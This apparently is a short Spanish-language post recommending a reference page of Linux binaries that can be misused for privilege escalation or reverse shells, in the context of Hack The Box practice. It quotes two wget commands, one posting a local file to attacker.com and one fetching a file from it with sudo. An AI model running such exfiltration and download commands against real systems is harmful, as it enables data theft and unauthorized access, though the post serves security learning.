Hoy me mandaron una página incredible de funciones de Linux y como pueden ser ( abused to get the f**k break out ) brincadas si hay alguna misconfiguracion para elevar tus privilegios o hacer reverse shells. Aquí 🙂
Algunos ejemplos de los que ya usamos en hack the box y me hubieran ahorrado bastante tiempo:
Sacar archivos:
export URL=http://attacker.com/ export LFILE=file_to_send wget --post-file=$LFILE $URL
Bajar archivos con sudo
export URL=http://attacker.com/file_to_get export LFILE=file_to_save sudo -E wget $URL -O $LFILE
Etc. es una maravilla.
Pero como somos incluyentes igual esta la versión de windows